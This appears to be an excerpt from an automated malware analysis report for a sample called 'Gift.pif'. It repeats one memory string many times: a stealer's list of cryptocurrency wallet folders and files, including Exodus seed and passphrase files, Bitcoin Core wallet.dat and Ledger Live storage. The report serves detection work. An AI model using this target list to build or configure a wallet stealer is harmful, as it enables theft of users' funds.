                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
